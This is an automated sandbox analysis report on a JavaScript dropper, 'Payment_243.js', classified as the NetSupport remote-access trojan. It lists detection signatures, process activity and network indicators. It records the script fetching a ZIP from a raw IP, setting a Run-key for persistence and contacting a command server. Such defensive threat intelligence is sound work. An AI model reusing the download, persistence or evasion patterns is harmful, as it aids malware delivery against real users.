Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment_243.js

Overview

General Information

Sample name:Payment_243.js
Analysis ID:1591022
MD5:19cef6a2f4055703922f3e8fd2c92fb9
SHA1:e6ccef88b3cbba0424a39edab01697716fd8d813
SHA256:d0480e3927154036684ba2a60dba9576234bae2aa484294c3d925923de55196f
Infos:

Detection

NetSupport RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for dropped file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Contains functionalty to change the wallpaper
Delayed program exit found
Deletes itself after installation
JavaScript source code contains functionality to generate code involving HTTP requests or file downloads
JavaScript source code contains functionality to generate code involving a shell, file or stream
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file does not import any functions
Potential key logger detected (key state polling based)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: DNS Query To Remote Access Software Domain From Non-Browser App
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Tries to disable installed Antivirus / HIPS / PFW
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

  • System is w7x64
  • wscript.exe (PID: 3364 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_243.js" MD5: 045451FA238A75305CC26AC982472367)
    • client32.exe (PID: 3748 cmdline: "C:\ProgramData\x225qa0\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)
  • client32.exe (PID: 3908 cmdline: "C:\ProgramData\x225qa0\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)
  • client32.exe (PID: 3992 cmdline: "C:\ProgramData\x225qa0\client32.exe" MD5: C4F1B50E3111D29774F7525039FF7086)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\ProgramData\x225qa0\client32.exeJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\ProgramData\x225qa0\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\ProgramData\x225qa0\PCICHEK.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\ProgramData\x225qa0\HTCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\ProgramData\x225qa0\TCCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 2 entries
            SourceRuleDescriptionAuthorStrings
            00000006.00000000.529790878.0000000000AA2000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
              00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                00000004.00000002.670588209.0000000000AA2000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                  00000004.00000000.516821762.0000000000AA2000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                    00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                      Click to see the 18 entries
                      SourceRuleDescriptionAuthorStrings
                      6.2.client32.exe.73620000.5.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                        8.2.client32.exe.71660000.4.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                          4.2.client32.exe.aa0000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                            6.0.client32.exe.aa0000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                              6.2.client32.exe.aa0000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                                Click to see the 20 entries

                                System Summary

                                barindex
                                Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 45.155.249.215, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 3364, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
                                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_243.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_243.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_243.js", ProcessId: 3364, ProcessName: wscript.exe
                                Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\x225qa0\client32.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\wscript.exe, ProcessId: 3364, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\(Default)
                                Source: DNS queryAuthor: frack113, Connor Martin: Data: Image: C:\ProgramData\x225qa0\client32.exe, QueryName: geo.netsupportsoftware.com
                                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 45.155.249.215, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 3364, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
                                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_243.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_243.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1244, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Payment_243.js", ProcessId: 3364, ProcessName: wscript.exe
                                Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Windows\System32\wscript.exe, ProcessId: 3364, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-01-14T16:21:07.992710+010028277451Malware Command and Control Activity Detected192.168.2.2249166185.157.213.71443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2025-01-14T16:21:08.602563+010018100041Potentially Bad Traffic192.168.2.224916545.155.249.21580TCP

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Source: C:\ProgramData\x225qa0\HTCTL32.DLLReversingLabs: Detection: 15%
                                Source: C:\ProgramData\x225qa0\PCICHEK.DLLReversingLabs: Detection: 18%
                                Source: C:\ProgramData\x225qa0\PCICL32.DLLReversingLabs: Detection: 18%
                                Source: C:\ProgramData\x225qa0\client32.exeReversingLabs: Detection: 31%
                                Source: C:\ProgramData\x225qa0\pcicapi.dllReversingLabs: Detection: 15%
                                Source: C:\ProgramData\x225qa0\remcmdstub.exeReversingLabs: Detection: 28%
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_110ADA40 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,4_2_110ADA40
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\PROGRA~3\x225qa0\msvcr100.dllJump to behavior
                                Source: Binary string: msvcr100.i386.pdb source: client32.exe, client32.exe, 00000006.00000002.530287670.000000006A0E1000.00000020.00000001.01000000.0000000B.sdmp, client32.exe, 00000008.00000002.547818882.000000006A0E1000.00000020.00000001.01000000.0000000B.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530108204.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547693910.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: client32.exe, 00000004.00000002.671102639.0000000071610000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\Full\pcichek.pdb source: client32.exe, 00000004.00000002.671173714.0000000073622000.00000002.00000001.01000000.0000000A.sdmp, client32.exe, 00000006.00000002.530359890.0000000073622000.00000002.00000001.01000000.0000000A.sdmp, client32.exe, 00000008.00000002.547917343.0000000073622000.00000002.00000001.01000000.0000000A.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\client32\Release\client32.pdb source: client32.exe, 00000004.00000002.670588209.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000004.00000000.516821762.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000006.00000000.529790878.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000006.00000002.530048197.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000008.00000002.547582545.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 00000008.00000000.547201521.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, client32.exe.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: client32.exe, 00000004.00000002.671102639.0000000071610000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: client32.exe, 00000004.00000002.671142081.0000000071665000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000006.00000002.530337343.0000000071665000.00000002.00000001.01000000.0000000C.sdmp, client32.exe, 00000008.00000002.547879856.0000000071665000.00000002.00000001.01000000.0000000C.sdmp, pcicapi.dll.0.dr
                                Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530108204.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547693910.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.dr
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,4_2_111273E0
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102D9F4
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102DD21
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_1110BD70 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,4_2_1110BD70
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,4_2_110663B0
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,4_2_1106ABD0
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A13CA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,6_2_6A13CA9B
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A140B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6A140B33
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A140F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6A140F84
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A13EFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6A13EFE1
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A140702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6A140702
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A13C775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,6_2_6A13C775
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A13DA38 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_seterrormode,SetErrorMode,6_2_6A13DA38
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A13F8B5 _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6A13F8B5
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A13DF35 _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,__invoke_watson,6_2_6A13DF35
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A107C6D _wstat64i32,_wcspbrk,_getdrive,FindFirstFileExW,_wcspbrk,_wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,___loctotime64_t,free,_wsopen_s,__fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___wdtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6A107C6D
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A13FD86 _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime32_t,free,__wsopen_s,__fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime32_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6A13FD86
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A13F40B _stat64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,free,___loctotime64_t,free,__wsopen_s,__fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,6_2_6A13F40B
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_6A13D4FF _findfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,_findnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,strcpy_s,__invoke_watson,6_2_6A13D4FF
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                                Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\desktop.iniJump to behavior

                                Software Vulnerabilities

                                barindex
                                Source: Payment_243.jsArgument value : ['"WScript.Shell"']
                                Source: Payment_243.jsArgument value : ['"Shell.Application"', '"WScript.Shell"']
                                Source: Payment_243.jsArgument value : ['"Shell.Application"', '"WScript.Shell"', '"Scripting.FileSystemObject"']
                                Source: Payment_243.jsArgument value : ['"Shell.Application"', '"WScript.Shell"', '"Scripting.FileSystemObject"']
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4x nop then add byte ptr [edi], dh6_2_6A0F8468
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4x nop then push esi6_2_6A0EF640

                                Networking

                                barindex
                                Source: Network trafficSuricata IDS: 1810004 - Severity 1 - Joe Security ANOMALY Microsoft Office HTTP activity : 192.168.2.22:49165 -> 45.155.249.215:80
                                Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.22:49166 -> 185.157.213.71:443
                                Source: C:\Windows\System32\wscript.exeNetwork Connect: 45.155.249.215 80Jump to behavior
                                Source: Payment_243.jsArgument value : ['"GET","http://45.155.249.215/xxx.zip?mt=6364",false']
                                Source: Payment_243.jsArgument value : ['"GET","http://45.155.249.215/xxx.zip?mt=6364",false']
                                Source: Payment_243.jsArgument value : ['"MSXML2.XMLHTTP"']
                                Source: Payment_243.jsArgument value : ['"MSXML2.XMLHTTP"']
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: Joe Sandbox ViewIP Address: 104.26.0.231 104.26.0.231
                                Source: Joe Sandbox ViewASN Name: MEER-ASmeerfarbigGmbHCoKGDE MEER-ASmeerfarbigGmbHCoKGDE
                                Source: Joe Sandbox ViewASN Name: TVHORADADAES TVHORADADAES
                                Source: global trafficHTTP traffic detected: GET /xxx.zip?mt=6364 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 45.155.249.215Connection: Keep-Alive
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
                                Source: unknownTCP traffic detected without corresponding DNS query: 45.155.249.215
